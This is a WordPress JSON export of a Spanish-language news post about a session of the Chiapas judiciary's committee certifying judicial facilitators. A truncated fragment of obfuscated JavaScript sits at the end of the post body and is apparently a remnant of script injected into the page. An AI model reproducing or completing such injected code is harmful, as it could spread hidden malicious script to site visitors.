{"id":5896,"date":"2022-10-17T23:40:44","date_gmt":"2022-10-17T23:40:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5896"},"modified":"2022-10-17T23:40:44","modified_gmt":"2022-10-17T23:40:44","slug":"realiza-poder-judicial-sesion-extraordinaria-del-comite-de-certificacion-de-facilitadores-judiciales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5896","title":{"rendered":"Realiza Poder Judicial Sesi\u00f3n Extraordinaria del Comit\u00e9 de Certificaci\u00f3n de Facilitadores Judiciales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"324\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1666044560323.jpg\" alt=\"\" class=\"wp-image-5897\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1666044560323.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1666044560323-300x135.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>17 de Octubre del 2022. En seguimiento a las acciones establecidas desde el Comit\u00e9 de Certificaci\u00f3n de Facilitadores Judiciales Especializados en Mecanismos Alternativos de Soluci\u00f3n de Controversias en Materia Penal y de Justicia para Adolescentes, instalado en marzo del presente a\u00f1o, se llev\u00f3 a cabo la Primera Sesi\u00f3n Extraordinaria de este Comit\u00e9, como \u00f3rgano auxiliar interno del Poder Judicial.<\/p>\n\n\n\n<p>En esta reuni\u00f3n de trabajo, encabezada por la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores, en su calidad de presidenta de dicho Comit\u00e9, se desahogaron los puntos de la orden del d\u00eda para la implementaci\u00f3n y observancia de los Lineamientos para la Certificaci\u00f3n de Facilitadores Judiciales que fue expedido por el Consejo de Certificaci\u00f3n en Sede Judicial, de la Comisi\u00f3n Nacional de Tribunales de Justicia.<\/p>\n\n\n\n<p>Luego de debatir y votar los asuntos a tratar por parte de las y los integrantes, se dio por clausurada esta sesi\u00f3n extraordinaria por parte de la presidenta del Comit\u00e9, Isela Mart\u00ednez Flores, quien adem\u00e1s hizo extensivo el mensaje del magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, en continuar cumpliendo con los criterios y procedimientos establecidos para la capacitaci\u00f3n de las y los servidores p\u00fablicos en esta materia.<\/p>\n\n\n\n<p>Estuvieron presentes en esta sesi\u00f3n, la jueza de Primera Instancia del Juzgado de Control, Juicio Oral y Ejecuci\u00f3n, Especializada en Justicia Penal para Adolescentes, Jaqueline \u00c1ngel Juan; el director del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, Pedro Farro \u00c1lvarez; el magistrado presidente y titular de la ponencia \u201cA\u201d de la Primera Sala Regional Colegiada en Materia Penal, Carlos Alberto Bello Avenda\u00f1o y la directora General del Centro Estatal de Justicia Alternativa (CEJA), Elisheba Goldhaber Pasillas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>17 de Octubre del 2022. En seguimiento a las acciones establecidas desde el Comit\u00e9 de Certificaci\u00f3n de Facilitadores Judiciales Especializados en Mecanismos Alternativos de Soluci\u00f3n de Controversias en Materia Penal y de Justicia para Adolescentes, instalado en marzo del presente a\u00f1o, se llev\u00f3 a cabo la Primera Sesi\u00f3n Extraordinaria de este Comit\u00e9, como \u00f3rgano auxiliar &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5897,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5896","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5896","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5896"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5896\/revisions"}],"predecessor-version":[{"id":5898,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5896\/revisions\/5898"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5897"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}